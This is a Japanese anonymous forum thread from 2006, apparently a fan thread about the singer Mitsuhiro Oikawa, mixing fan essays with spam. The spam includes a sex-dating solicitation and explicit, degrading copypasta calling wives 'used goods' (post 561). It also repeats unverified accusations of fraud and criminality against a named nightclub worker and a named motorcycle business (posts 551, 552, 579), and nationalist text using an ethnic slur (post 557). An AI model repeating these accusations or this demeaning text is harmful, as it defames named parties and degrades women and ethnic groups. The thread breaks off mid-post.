はじめまして。
割り切りでお互いを詮索しないセフレができたらと思って、ココに入会しました。
もう相手見つけましたか?
すこし自分のこと書きますね
☆年齢は34だけど少し若くみられます♪
くびれと長めの脚はちょっと自慢かな♪
私は軽くMなタイプなので手首を縛られて言葉でイジメられたい願望があります(//?//)本格的なSMは無理だけど。
だからあなたが軽いSだったら嬉しいです(笑)
性格的には明るいほうなので打ち解けやすいと思います。
デートでは最低限10万使えればと思います。
あなた次第ですけどネ♪事前に写メ交換できると嬉しいです。
美形ではないけど嫌ではないと思います☆返事くださいネ

549 :NO MUSIC NO NAME:2006/09/12(火) 00:33:03 ID:ncWrI/oi
>>544
あたしは淑徳与野の3年なんだけど、今日友達に最悪なこと聞いちゃった…。
なんか、あるクラスのOさんが定期考査の終わった後とかにK先生に「私の評定、絶対5にしてくれますよね?」的なことを聞き、
先生は「うん」と答えたらしいが、結局は4だったらしく、
OさんはK先生に「あの時絶対5にしてくれるって言ったじゃないですか」
と文句垂れ流し状態…。
だけどK先生はちゃんとした良い先生だから
「もう終わったことだから〜」と放置プレイ。
その後Oさんは、担任に電話をして泣きついたのだ…。

ありえなくない?
しかもその担任までK先生に
「なんでOさんの評定が5じゃないんだ」とか怒ったらしいが、またもやK先生は放置プレイ。
Oさんのその言動もありえないし、担任もどうしたことやら…。
爪かんでるしね…。
ちなみにOさんは指定校推薦を狙ってるらしいんだけど、そ
んな人に指定校で大学行って欲しくない。
部活だってろくに頑張ってる様子もないし…。
ただ単に指定校とるために部活の名が欲しいだけ…。
やはり男は女に泣かれると弱いものなのだろうか…。

撃沈…。

550 :NO MUSIC NO NAME:2006/09/12(火) 00:34:07 ID:K6H3sNOi
>>544
■ 基本パターン

・ほとんどの場合、番号非通知で電話してくる。(例外もあり)
 また、電話では正式な会社名を名乗らないことも多い。

・電話を取ったら最後、いくら断ろうが電話を切らせない。
 (「話を聞かないのであれば、直接家に行くぞ」と迫ることも。)

・会社の所在地などを聞こうとすると、なかなか言いたがらない。
 (「直接家を訪問して名刺を渡す」と話を切り替えたりもする。)
・何気なく職業や年収など、個人情報をあれこれ聞き出そうとする。

・途中から人を怒らせるような言動をしかけてくる。
 また、声色を変えたり、恐喝まがいの台詞で脅しをかけてくるケースもある。
 (怒りや恐怖感は人間の冷静な判断力を失わせることを、彼らは知っている?)

・強制的に電話を切ると何度もリダイアルしてくる。
 (「勝手に電話を切るなんて失礼だろ!なめてるのか!」などと逆切れすることも。)

彼らの目的は、“自宅訪問のアポを得ること”にあります。
そのため、様々な手段を使って相手にストレスを与え、精神的に弱らせ、
仕方なく自宅訪問を承諾する方向へと追い込むのが、彼らの手口と言われています。

■ 対処の鉄則

「会話しないこと」 これに尽きる!
 ^^^^^^^^^^^^^^^
自宅であれば「ナンバーディスプレイ」を導入し、非通知などの電話は拒否するよう設定しておくと効果的。
職場にかかってくる場合は、職場全体で連携を取り、電話を取り次がないよう工夫しましょう。

551 :NO MUSIC NO NAME:2006/09/12(火) 00:36:51 ID:ICvzD7Bj
>>544
大阪南「冗談酒場」ニューハーフ島ノ内未来の真実・・・・!
5000万円詐欺を鍋彼と一緒に働いた。
未来は名古屋の美容師おこげをもえちゃんに盗られた後おなべ女々子と同棲しだした。まだそのおこげと付き合ってる時から、Kから詐欺っていた。
Kには借金とかいろんな嘘をついては詐欺を働いてた。
未来は店のドレスをはじめ服、部屋の家賃、借金、食費の大半、家電他・・・・CD,DVD,漫画本に至るまでKに頼っていた。
当時ママだった伊予から頼まれた借金50万円も、結局Kに出させた。
未来が言い訳で書き込みしていた、ふったというのは真っ赤な嘘!
未来は金銭目的で鍋彼と同棲しながらKに言い寄っただけ。そういうのは「詐欺る」または「未来る」と言う。
未来はKと2003年1月に知り合い
詐欺は2005年12月に発覚、2006年1月に詐欺について言い逃れができなくなり連絡を断った。
未来は都合が悪いから逃げたのだ。
未来は穴塞不感症なのですけべ心なんか起きるわけがない。
未来はあれだけKに世話になっておきながら、詫びのひとつも入れていない。

日本一性悪ニューハーフである!・・・

552 :NO MUSIC NO NAME:2006/09/12(火) 00:39:57 ID:FCHP/2yL
>>544
金城サイクルグループは
ペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張している。
しかしちょっと待って欲しい。
ペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張する
には早計に過ぎないか。
金城サイクルグループの真摯な姿勢が、今ひとつ伝わってこない。
例えば日本
介錯人協会からは数々の犯罪行為を全く反省してないと主張するような声もある。
このような声に金城サ
イクルグループは謙虚に耳を傾けるべきではないか?
思い出してほしい、過去にも何度も金城サイクル
グループは日本介錯人協会の叫びを無視している。
金城サイクルグループは日本介錯人協会の数々の
犯罪行為を全く反省してないという主張を間違いであるかのような発言をして、批判を浴びた。
確かに日本介錯人協会には過激な団体という問題もある。
だが、心配のしすぎではないか?
金城サイクルグループの主張は一見一理あるように聞こえる。
しかし、だからといって本当に金城サイクル
グループはペーパー車検・損保詐欺なんてどこのバイク屋でも やってる事と主張できるのであろうか?それは
いかがなものか。
的はずれというほかない。 事の本質はそうではではない。
その前にすべきことがあるのではないか。
金城サイクルグループは、未来を担う一員として責任があることを忘れてはならない。
金城サイクルグループの主張には危険なにおいがする。各方面の声に耳を傾けてほしい。
金城サイクルグループに疑問を抱くのは私達だけだろうか。
ペーパー車検・損保詐欺なんてどこのバイク屋でも
やってる事と主張したことに対しては日本介錯人協会の反発が予想される。
数々の犯罪行為を全く反省してないという
主張を支持する声も聞かれなくもない。
金城サイクルグループもそれは望んでいないはず。しかし金城サイクルグループ
は一見「良い人」を装った犯罪集団である。
ペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張する事は
あまりに乱暴だ。金城サイクルグループは再考すべきだろう。
繰り返すが金城サイクルグループは一見「良い人」を装った犯罪集団である。
金城サイクルグループのペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張したことは波紋を広げそうだ。
今こそ冷静な議論が求められる

553 :NO MUSIC NO NAME:2006/09/12(火) 00:47:05 ID:9f65iqRy
>>545
私が入るまで出たり入ったり状態で1年2ヶ月人新人が居つかなかったらしい
でも私も辞表出しました。

首を痛めて肘まで痛くて休みたいって言ったら
出て来いって言われた・・・頑張って行ってたけど、
職員は他の職員の事なんて知ったこっちゃない感じ
自分の仕事が終わったら人に押し付けてとっととご帰宅、
出来ないのが当たり前って言った癖に出来ないと嫌な顔される始末。

ヘルパー取ったばっかの新人一人で40人の排泄介助は出来ません!!!

精神的にきついし、まだ研修中だし嫌々仕事しても事故の元だからと思って辞表をだしたら、
誰でも乗り越えた道だから出て来いって・・・出来ない人もいるんです!!

それともシフトを作りなおすのが面倒くさいのですか?

施設的には利用者の事を考えてる良い施設だと思ったら、
開けてびっくり・・職員本位じゃん

利用者に「邪魔だからどいて!!」
言えるお前は何様?理想だけで現実がついていってない

ちなみに制服はありません。
私服でお仕事です。
理由は利用者さんの住んでいる処で制服着るのはおかしいんだという見解だそうです。

でも感染予防のためにわざわざ
私服→私服に着替えてお仕事です。

私達への感染予防は?
介護職に就くんじゃなかったと後悔さえしてます。

554 :NO MUSIC NO NAME:2006/09/12(火) 01:02:09 ID:hwwO9tq/
>>544
残念ながらタラシですw (最近では割と落ち着いたようだけど)
そして、貴女が言うように、自称ではSだそうだけど
真実のところは、Mだと思う。(あくまでも私自身の主観と願望かも)

それと、これ↓
>そんな光景を見て。どんなにご満悦なんだろうな。

本人、猜疑心と或る種の警戒心を抱きつつ、
あの全てをやって(やらせて)いるようだよ。
一歩間違えたらファシズムになってしまうと。
それではいけない、そうならないための制御が必要だと
常に意識はしているらしい。インタビューでそんなような事を語ってたことがあった。

>>545 いいね。他人のカタルシスを覗くの好きだ。飽きるまで演って。
長いマントを羽織った気の触れた演者が、黒眼鏡越しに頭蓋骨に接吻する姿が観えて来るかも・・・

555 :NO MUSIC NO NAME:2006/09/12(火) 01:04:36 ID:Ei+Jr1tb
>>544
オリンピック正式種目の選定基準の問題 (浅野文直) 2006-07-23 18:15:56

女子スポーツ並びに女子サッカーを否定するものでは、あくまでもオリンピック正式種目に相応しいのか?
又は、種目の選定基準に疑問を抱くものです。
確かに、私は女子サッカーの現状について熟知しておりません。FIFAランク13位ですか。しかし、ボール一つで
出来るサッカーという種目でありながら、世界中で女子サッカーがどの程度流行っているのでしょう。
競技人口だけでいえば、柔道をはじめ格闘技など競技人口の少ないものはあります。
しかし、それは同じスポーツでもカテゴリー分けをしてみる必要があります。
また、マラソンなど陸上競技をはじめ、女子競技でも男子以上に感動を与えてくれる見ごたえのあるものは
多いですよね。
私は、1聴衆として女子サッカーをみて、正式種目には早い。野球でもバレーでもボーリングでもダーツでも
ゴルフでもビリヤードでも・・・、範疇をしっかり規定すれば、本来正式種目に成るべき種目と成らざるべき種目の
逆転があり、それを司る組織にそれを望むものであります。
競技の盛り上がりの為に正式種目にするならば、他のスポーツも皆そうであり、正式種目にする時期の問題であると
考えます。
また、男女平等で女子部門も正式種目にするならば、何時までたっても私のような聴衆は存在するでしょうし、
ソフトではなく女子野球なども正式種目にしないとおかしいのではないでしょうか。

556 :NO MUSIC NO NAME:2006/09/12(火) 01:08:26 ID:2hiTBLjb
プロデューサーの及川さんはSだけどみっちーさんはMな感じ

557 :NO MUSIC NO NAME:2006/09/12(火) 01:08:34 ID:r8YG8H7g
>>554
ここで日本人として最高の礼を尽したかったからです
靖国神社は、神道ですが、ちょっと違うところがあります。

神道の信仰の中で、國や公共の為に、著しい貢献をした方で、
その為に、命を捧げた方を神として祀り、この神様が、子孫の幸福を暖かく見守ってくれているとの信仰が神道にあります。

靖国神社は240万余柱のこのような神々を祀る神社なのです。
台湾出身真の方で先の大戦で亡くなられた志願兵、28,000余柱も靖国神社に祀られています。

この方達は日本の守り神となったと日本では信じられているからです。

そんなわけで、凶惨恐怖支那政権や、シナ人の馬英九、
そしてシナ系の台湾のマスコミが言っていることは根拠の無い言い掛かりです。 

これに対して、靖国神社は一切の反論をしません。

反撃するのは日本人で靖国神社ではありません。

神道とは人と争わない宗教です。神社はひたすら祀るだけです。

他の神社にも行かれることを薦めます。

清浄感と静寂さ、そして森と水を大切にする日本人の心を感じ取る事が出来ると思います。

多分、大東亜戦争末期に龍潭から多くの若者が、
沖縄の空を目指して特攻に飛び立って往かれたことをご存知の方であったと想像しています。

龍潭は近くの、八塊、観音両基地と共に沖縄に向けての前進基地として、
1945年四月から六月まで陸軍特攻隊が連日のように出撃しておりました。

 龍潭は一式戦闘機“隼”を使う飛行二十戦隊の出撃基地であったと記憶しております。
八塊、龍潭から飛び立った台湾の若者達、そして彼等が出撃までの数日をすごした、
大渓と言う町の佇まいは六十余年を経た今でも忘れることが出来ません。

558 :NO MUSIC NO NAME:2006/09/12(火) 01:10:31 ID:72x1xeyh
>>555
一番上は間違ってない?
厳密には、日本でも朝鮮でも、意見は割れてたはず
ミン妃(漢字が分からん)と日本軍部が手を組んで、朝鮮に日本軍を置いた
そして、日本軍がミン妃を暗殺(バレバレだった)して、権力を握った
韓国の文官と伊藤博文はどっちも反対してた

インフラとか学校なんてのも、日本の一部として扱うために生活水準を上げるためであって、
善意なんて全くないよ
当時、時間をかけて行う予定だった近代化を日本が無理に進めただけ
政治とかをクリーンにするために、賄賂とか禁止したのは逆効果
おかげで、寒村なんかでは税金払えなかったりして酷いことになった
(それまでは、役人に頼んで待ってもらったりとか普通にあった)

とにかく、>>544は嘘ではないけど、全てでもない

559 :NO MUSIC NO NAME:2006/09/12(火) 01:13:16 ID:72x1xeyh
>>545
世間の風潮の可能性が高いな。
何故なら処女を忌避する文化も確実にあるからな。
だが、男女のあり方も所詮は世間の風潮にしか過ぎない。
国によって、歴史によって、男女のあり方は変わっていった。

処女という信仰を失った場合、この国の男女のあり方がどう変わるのか楽しみ
に見せてもらおうじゃないかw

あと、処女を忌避する文化とやらが一体女という生き物をどういう生態として
扱ったのか、その文化の男にとって女はなんだったのか、
女がその文化ではたして幸せだったのか調べてみるととても面白いと思うぞ。

>自ら人生を思索し哲学して作り上げた価値観

実際はこんなものに何の価値も無い。何故なら他人と協調された価値観の集合
が世間の風潮だからな。己の価値観で価値があると断言できるのは、己自身だ
け。周りには何の影響も与えない。

30年前の流行の服を着て街を歩くようなものだな。

560 :NO MUSIC NO NAME:2006/09/12(火) 01:13:26 ID:hwwO9tq/
>>556

その感じ、ワカルワカルw

561 :NO MUSIC NO NAME:2006/09/12(火) 01:15:00 ID:/V8xOoS+
>>554
貴方の奥さんは処女でしたか?

妻の上を通り過ぎていった幾人もの男達。
太いチンポを入れられ、男の背中に手を廻し悶えていた。
アナルまで見せながら尻を掴まれバックで犯されていた。そうは思いませんか?

貴方がキスした奥さんの唇・舌は他のチンポを舐めまわしていた汚れた唇。
奥さんにセックスを仕込んだ男達のことを考えると胸が熱くなりませんか?

貴方の奥さんは、あなたと出会った時に既に中古品でした。
これは、貴方の奥さんの処女膜を破った男のみならず、
あなたが奥さんに出会う前に貴方の奥さんを抱いた他の男達のすべてが
あなたが、貴方の奥さんを初めて抱いたときよりも良い状態の奥さんの肉体を弄んでいたのです。
貴方と出会う前より若かった時の状態の良い肉体を他の男達が弄んでいたのです。
あなたは、その何人もの男達に調教され、その男達の唾液や汗や精液を体細胞に浸透させられ、
しかも老化が既に進行してしまっていた中古女を奥さんに貰ったのです。

ひょっとしたら、中絶を経験してるかもしれません。
貴方の奥さんは、他の男の子供を体内に宿していたのかもしれないのです。

あなたは、一人の男として、悔しくありませんか?
一生の伴侶である妻が中古女であった事を。
悔しさで胸が張り裂けそうになりませんか?

562 :NO MUSIC NO NAME:2006/09/12(火) 01:54:02 ID:hwwO9tq/



まるで、砲弾が頭上を飛び交う壁際で
密会するかの如きスレになりそうだ・・・




563 :NO MUSIC NO NAME:2006/09/12(火) 02:36:06 ID:O8zh4Mz1
だから及川光博は。
戦場をくぐり抜けて来た人のような顔なと思います。

564 :NO MUSIC NO NAME:2006/09/12(火) 02:40:44 ID:O8zh4Mz1
>>554さn
ファシズム的要素はゆんゆん感じます。
及川光博は、食後のドルチェではない。

このコピペ。
どこから拾ってくるのかな。結構面白いじゃないか。
潰してるつもりだろうけど。
楽しんでます。もっとやったら良いだろう?
マヂレスしたくなるなあ。







565 :NO MUSIC NO NAME:2006/09/12(火) 02:52:40 ID:2hiTBLjb
>>563
でも時々まるで子供みたいな顔で笑ったりするよ

566 :NO MUSIC NO NAME:2006/09/12(火) 02:55:20 ID:j2CrJQPX
赤子のごとき その愛しい笑顔を
守ってあげたい
守ってあげたい

567 :NO MUSIC NO NAME:2006/09/12(火) 02:56:12 ID:O8zh4Mz1
>>562さn
まさにw

難民の記録映画
標的を背にした恋人たち
道に石を投げれば粉々に砕け
昨日に蓋をすれば恐怖は増す

俺現実から締め出され
何が起きているか分らない
何処に教訓はあるか
人々は指を折られている
こんな独裁者に卑しめられるのは悲しい

これはゲームなんかじゃない

か。そうだな。分ったぞ。

568 :NO MUSIC NO NAME:2006/09/12(火) 03:04:37 ID:O8zh4Mz1
その子供のごとき屈託のない笑顔が。
曲者なのだ。

戦場は最も美しい修羅場だ。
それは、人々がやがて確実に襲う死の恐怖の中で。
今出来る最善の努力をする。
その時命は最高の輝きを見せる。
その神経系統の高揚が。あるXTCをかもし出す。
日本沈没の柴咲コウが。顔に泥して美しく見えた。

恐怖と畏怖。
ライヴの映像を見かぎり美しさの畏怖の前に高揚した熱気が。
あの熱狂を呼ぶんだろう。そしてそれから貴方ベイベは何を望む?
再び巻き起こる戦争を待っているんだろう?
テロリスト
子供のような笑顔を湛えたテロリスト

569 :NO MUSIC NO NAME:2006/09/12(火) 03:28:13 ID:PylvBR2N
これだけは言うけど。

>戦場は最も美しい修羅場だ。

震災で、道端で命果てた人、傷ついた人をたくさんみた。地獄だと思った。
だから人殺しの場が美しいとは、私は思えない。
以上、チラ裏スマソ

570 :NO MUSIC NO NAME:2006/09/12(火) 03:34:48 ID:O8zh4Mz1
ものの例えだ。
>>569さnの言うとおり。
戦争はおぞましきもののなにものでもない。
9・11という非常に悲惨なことがあった日に。
こんな物騒なものの例えとは言えど。
悲しい事にタブーを侵した。心から正直に謝罪する。




571 :NO MUSIC NO NAME:2006/09/12(火) 03:38:17 ID:O8zh4Mz1
それにしてもコピペの人は健気で可愛いな。
きちぐゎぃがみっちーを侮辱するゎーとか。
スレが汚れちゃうワーとかで可愛いな。

及川絡みにしてくれるともっと面白いんだけどw

吉野家!
中村屋!

とか。
こないだいったんですよミチライヴ。そしたらなんか人が沢山居て

572 :NO MUSIC NO NAME:2006/09/12(火) 03:47:59 ID:9lwTPyBa
>>569
過剰反応うざい
被害者ぶって説教はヤメロ

573 :NO MUSIC NO NAME:2006/09/12(火) 04:18:44 ID:hwwO9tq/
569-570の流れ、スキ。

574 :NO MUSIC NO NAME:2006/09/12(火) 04:52:58 ID:hwwO9tq/
>>567 仮眠して起きたら、大胆なレスポンスを発見してちょっと感激したところ。

>>568 これは大量虐殺でもない。

クライム・アートや、ジェノサイド、スーサイド・・・
他諸々のカタストロフィーを題材として創造・演出をするのには
ある程度の平穏で幸福な日常と、浅 い 絶望が必要だと。

世界が・人類が、真に深い絶望に瀕している時、
この先の道にも、光が射すこと・希望が在ることを
如何に眼前にいる、数多の人々に信じさせるか――?!
芸術家は、何を置いてもそのことを第一に考えるものだと、
諭してくれた作家がいた。
(これはつまり、>>486 >>491 への私的なレスポンスでもある。)

今、この時代に置いては、刺激でもなく癒しでもなく。宗教でも同調でもなく。

ひたすらに光と希望と、この世界の陽的な部分を謳歌してみせる、
ぬるま湯か、掘り炬燵のように居心地のよいあの空間の中で。
満面の笑みを湛え、愛と希望を歌うアーティストの顔が、明るく輝けば輝くほど。
だからこそ私は、真に世界が抱える闇の深さを実感して、恐ろしくなる。

禍禍しい狂気や、観客を奈落の底に落とすような惨劇が、
純粋なエンタテイメントとして、ひとつのメタファーとして、
ステージ上で演じられることのあるくらいまでに、平和な時が、また来て欲しいと思う。
スリリングで物騒で、剣呑なミチーが、私だって観たいよ。ステージの上ではね。

575 :NO MUSIC NO NAME:2006/09/12(火) 05:51:31 ID:Vb2FnDz1
>>574の中段以降、特に同感。
最近のミチーがステージ上でみせるあの穏やかな眩い笑顔と
あの惜しみ無い愛に満ち溢れた歌の数々は、まんま、
世界の深くて暗い闇の鏡だなと思う。
今は、狂気より鋭気より悲劇よりももっとずっと
ちゃんと真っ向から伝えなきゃならないことがあるんだろうと。
『アーティスト』が、世の中の理不尽な事やどうにもならない位の深い闇を目の前にした時
まず何より先に世界に向けて叫ばなければいけないことは
哀れみの言葉でも憤慨の怒号でも決して無く、
>>574にあるように、『この闇の先の光』の存在と、世界を其処に導くための力であって。

ここ数年の・・・20010911以降のミチーはとりわけ、
その深く暗い闇からまたいつか必ず『世界』が
あの眩い光に照らされて尊い輝きを湛える事が出来る様にと
それこそ本当に命懸けでステージに立ち歌を歌っていると思う。
そう考えると、あの、本当に綺麗で穏やかな笑顔にさえ
ある意味狂気のパフォーマンスを観てる時よりよりも
もっとずっと激しく戦慄してしまう。
シニカルになることもペシミスティックになることも許される予断が無い位
世界の闇は深く暗く、そして重いんだな・・・と。

576 :NO MUSIC NO NAME:2006/09/12(火) 06:13:36 ID:Vb2FnDz1
こうやって言葉にすると大袈裟に見えるけど、でも
ミチー自身が言うところの『世界キラキラ大作戦』というのは
つまるところそういう事なんじゃなかろうかと。

音楽(アート)に出来る事には限りがあるはずで、
逆に言えば出来ない事の方が多いかもしれない。
《歌を作り歌う→→→受け手が歓ぶ》っていう単純な流れにただ乗っかるだけなら
多分どのアーティストでも出来るんだろうけど。
でも、ミチーにとっては、今はもうそれだけじゃ駄目なんだろうね。
(うたかた。ツアー@大阪一日目は、その最たる事例だと思う)

私的に、ただ単純にリスナーとしての歓びだけを求めるなら
そりゃやっぱり自分好みの音楽をやってほしいと思ったりするけど、
ミチー自身の、世界の闇を前にしてのあの凄まじい使命感と
あの崇高なまでに暖かい笑顔・眼差しを見せられてしまったら。
『よし。キラキラ大作戦、一緒に頑張っていこう。』と思ってしまう。

一緒にっていうとおこがましいけど。そこはまぁ、やっぱりミチー好きだしw
マンセーとか依存とか、ましてや宗教的絶対崇拝みたいなのじゃなく、
ミチーのアートを心から愛する受け手の一人として、ミチーを応援したい訳です。

577 :NO MUSIC NO NAME:2006/09/12(火) 06:25:49 ID:Vb2FnDz1
ついでだから言っちゃうけど、
ミチーが、世に数多居るただの『怒れる若者』でなくて良かった・・・と思う。

怒りや憎しみの叫びだけで希望の光に辿り着ける筈が無いもん。

大きな『LOVE』をもって、光への道標を放ってくれるミチーが大好きだ。

578 :NO MUSIC NO NAME:2006/09/12(火) 08:49:19 ID:p7xOq2aO
>>575-576 その熱意にシャッポを脱ぎます。

CDをヴォカールキャンセルして聞くと、音楽が浮きまくりますね。
やっぱり、及川光博というアーティストは、
あの容貌と、声と、全体の雰囲気をして、歌が成り立っている事を
実感しました。
総合芸術といったところでしょうか?
舞台とか衣装も手がけているみたいだし、正直言えば生見てみたいですね。

表でガンガンキャピりまくって、モラリティや僕のゼリー、あるいは
ココロノヤミで、内部のネガティヴで毒のある歌を聴かせて、
謂わば「ケムに巻く」ようなやり方、及川さんの深淵と文字通り
心の闇を具間見せることで、魅力を増大させる効果があると思います。

霧の中でに男を見ると、どんな男もグッド・ルッキング・ガイに見える手法が
有るけれど、及川光博は、本物の好い男だから、その振り幅は大きくなると
思います。確かにあの人は麗人。男はどんなに嫉妬するだろうか。
そのせいで、思うような仕事が出来ていないんではなかろうか?

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
今年デヴュー10周年らしいけど、俳優や雑誌、ラジオ、様々なメディアで、
どれだけ多くの仕事をこなしてきたんだろう。どれだけ多くの人格やキャラクター
を演じて・・・そしてどれだけ多くのファンの心を掴んで煙に巻き、遠くから
手招きしてきたんだろう。真の好い男のやり方。
雲をつかむような、あのもどかしさと夢。


579 :NO MUSIC NO NAME:2006/09/12(火) 08:50:01 ID:p7xOq2aO
>>571
金城サイクルグループは
ペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張している。
しかしちょっと待って欲しい。
ペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張する
には早計に過ぎないか。
金城サイクルグループの真摯な姿勢が、今ひとつ伝わってこない。
例えば日本
介錯人協会からは数々の犯罪行為を全く反省してないと主張するような声もある。
このような声に金城サ
イクルグループは謙虚に耳を傾けるべきではないか?
思い出してほしい、過去にも何度も金城サイクル
グループは日本介錯人協会の叫びを無視している。
金城サイクルグループは日本介錯人協会の数々の
犯罪行為を全く反省してないという主張を間違いであるかのような発言をして、批判を浴びた。
確かに日本介錯人協会には過激な団体という問題もある。
だが、心配のしすぎではないか?
金城サイクルグループの主張は一見一理あるように聞こえる。
しかし、だからといって本当に金城サイクル
グループはペーパー車検・損保詐欺なんてどこのバイク屋でも やってる事と主張できるのであろうか?それは
いかがなものか。
的はずれというほかない。 事の本質はそうではではない。
その前にすべきことがあるのではないか。
金城サイクルグループは、未来を担う一員として責任があることを忘れてはならない。
金城サイクルグループの主張には危険なにおいがする。各方面の声に耳を傾けてほしい。
金城サイクルグループに疑問を抱くのは私達だけだろうか。
ペーパー車検・損保詐欺なんてどこのバイク屋でも
やってる事と主張したことに対しては日本介錯人協会の反発が予想される。
数々の犯罪行為を全く反省してないという
主張を支持する声も聞かれなくもない。
金城サイクルグループもそれは望んでいないはず。しかし金城サイクルグループ
は一見「良い人」を装った犯罪集団である。
ペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張する事は
あまりに乱暴だ。金城サイクルグループは再考すべきだろう。
繰り返すが金城サイクルグループは一見「良い人」を装った犯罪集団である。
金城サイクルグループのペーパー車検・損保詐欺なんてどこのバイク屋でもやってる事と主張したことは波紋を広げそうだ。
今こそ冷静な議論が求められる

580 :NO MUSIC NO NAME:2006/09/12(火) 08:53:54 ID:SuqZnOoO
>>544さん
そうですね、確かにあの熱狂を見ると一流だ。でも。
歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?
評価というのは、熱狂する「喜び組み」がするものであって、その熱を、
コモンセンスとして共有できる人間にしか分かりえず、ある種のフェティシズムに
通じるものがあるとは言えないか。
それがXTC。まさしく狂乱の精神を私たちに植え付け、個々の中にマルティプライズ
させうる能力が、彼にはある。

ある一点の光が、寒天の培養器の中で増殖し、やがてコロニーを作る。
コロニーと化したその光はベイベたちのあのマスゲームに似たアクションを生む。
あのような動員をして熱狂せしめる人物は及川光博において他には
残念ながらこの日本においては居ないと。私は思う。

>>555さんのように「何で凄いのかよく分からない位凄い」と幻惑させるのは、
まさに及川光博の総合芸術に溺れる瞬間に、意識が違う世界へと誘う
からであろうと思う。そこにあるのは想念。そしてエクトプラズム。
ライヴで何が凄いか分からないほどになるのは、アーティストとの
崇高なシンクロニシティを味わうからであると思う。
同じベクトルとハイトを持ったシンクロニシティ。

ある日。
死んでしまった私の心を一種の麻薬のように。熱を枯渇させ、
美の渦に少しだけ足を踏み入れた感がある。

美の権化。及川光博に、ありがとうと言いたい。



>>567さん
マストの帆に風を巻かせて、船を進ませるようなそんな感じで、
ベイベたちが、風を巻き起こせばいい。
舵を取るのは及川光博キャプテン。
目を離したが最後。
それはあらぬ方向へ行ってしまい、それが見つからないとなると、
そこは人間の心情だ。
追いたくなるのが常である。
掴めそうで掴めない何か。水の屈折で何があるか分らない。手探りの
ファンタスティック・ボヤージュだと思う。
旅にでる。行き先の無い、あるときは荒唐無稽な場所とポーズで写真に
収まるけど、たちまち色あせてしまう。だがそこに、かつての心のざわめきを
起こせば、また自由に動き回る。皆のブレーンゲームみたいに。

ベイベ達。風を起こし、連れてってもらいな

581 :NO MUSIC NO NAME:2006/09/12(火) 08:54:30 ID:/dv2Zyu/
>>567
ここにいる多くのベイベ、ファン暦の長い人と語るのは至極傲慢ではあると、
自分で自覚しながら、私は自分の今の存在意義として、及川光弘を、
語りたく思う。cold fire。冷たい炎。これはミックに旦那を寝取られた
アンジーの歌でもあるが。それはさておき。

変わってしまったと言うファンの言葉は、表向き大変中庸を得た言葉
であるとも思う。ほら。私が横目で雑誌やTVの露出で見る、及川光博の
姿は、ある時は王子ある時はカマ。ある時は・・様々であるから。
変わっていないと感じるのは。
ずっとあの人の信念を信じ理解し、寄り添ってきたからではあるまいか。
目を離さず。時を経ず。そうやって理解しようと、御幣はある表現になるが、
「同情」する事が出来たから、変わったものも変わっていない様に
思うのではないか。超高速の乗り物に乗って時間と空間を共有する。しかし。
周りと自分達の時間の流れ方は確実に違う。そういう種類のものではないか。

変わらぬ信念を持ちつつ、
自分を変えていけるのは、ブレイブ・アポロの成せる業。
本当にゆるぎないポリティック・ポリシーを内に秘め、自分を変える勇気こそ。
心の鍛錬を積み重ねた僧侶のような静かに微笑をたたえた強き姿だと推測する。
ちょっと見。誰からも理解されず、誰からも誤解され。誰からも評価されないかもしれない
その行為を、個性的なペーソスと一緒に自分の体を駆使して表現するその精神は、
及川光博の世界そのものを現すものであろうと思う。
いまだかつてそのような人物は居ただろうか?

582 :NO MUSIC NO NAME:2006/09/12(火) 08:56:17 ID:74crHnYK
>>579
いかにも。あの時彼は、ロックンロールの自殺者を
(自己流のセオリーとメソッドに於いてだが)確かに体現していた。
しかしそれはとても too unfair なものに、当時は見えた。
あの自殺未遂と復活(死と再生)のパフォーマンスは
全ての彼のオーディエンスの心に、歴史的に大きな傷痕を残したと思う。
その精神的外傷の余韻は、未だ我々の裡深くに巣喰っていて
後々邂逅する全ての音楽体験のなかにすら色濃く裏移りする、
崇高にして禍禍しい、最強の原体験となってしまったりもしているのだが、
それは我々の Another Face。また別の物語なので此処では割愛。

Solution―― あの復活劇のなかで歌われた2曲のうちのこの1曲が、
21世紀になって改めて歌われたことの意味は大きいと思う。
芸術の創造者としての自己存在が、生と死を繰り返すことの不可避性。
先の劇中劇が演じられた当時は、
葛藤と挫折、絶望の部分のみが浮き彫りになったような印象を
聴衆に齎す演奏だったわけだが(先述した演技の文脈に起因すると思われる)、
時間を経て、より強靭な表現者となった同じ歌い手の喉から出るその声は、
芸術による躓き・御し得ない世界への畏れを負の要因とすることなく、
更なる飛躍のための糧とし礎とし、凌駕するに足る雄大な力に満ち充ちていた。

>>577にも指摘されているが、
懐かしくも愛しいあの旧曲達が、
常に新しい力と意志を吹き込まれ、生まれ変わって
目の前に届けられ続けていることが、なんとも嬉しい。
全く新しい曲が何よりも大切なのは言うまでもないけれど、
歴史や記憶を伴うその旋律が、
更なる確信と希望、未来の伝説を運んでやってくる。
この幸福を手放すほど愚かになることは、私にはできない。
(そこには、共にこの歳月を Survive してきた者としての聴衆への
sympathyやregard、honestyも幾許か込められていると、
夢想することすら許されるような気がしている。)


583 :NO MUSIC NO NAME:2006/09/12(火) 08:57:48 ID:XSulzGa0
>>568さん
そうですね、確かにあの熱狂を見ると一流だ。でも。
歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?
評価というのは、熱狂する「喜び組み」がするものであって、その熱を、
コモンセンスとして共有できる人間にしか分かりえず、ある種のフェティシズムに
通じるものがあるとは言えないか。
それがXTC。まさしく狂乱の精神を私たちに植え付け、個々の中にマルティプライズ
させうる能力が、彼にはある。

ある一点の光が、寒天の培養器の中で増殖し、やがてコロニーを作る。
コロニーと化したその光はベイベたちのあのマスゲームに似たアクションを生む。
あのような動員をして熱狂せしめる人物は及川光博において他には
残念ながらこの日本においては居ないと。私は思う。

>>549さんのように「何で凄いのかよく分からない位凄い」と幻惑させるのは、
まさに及川光博の総合芸術に溺れる瞬間に、意識が違う世界へと誘う
からであろうと思う。そこにあるのは想念。そしてエクトプラズム。
ライヴで何が凄いか分からないほどになるのは、アーティストとの
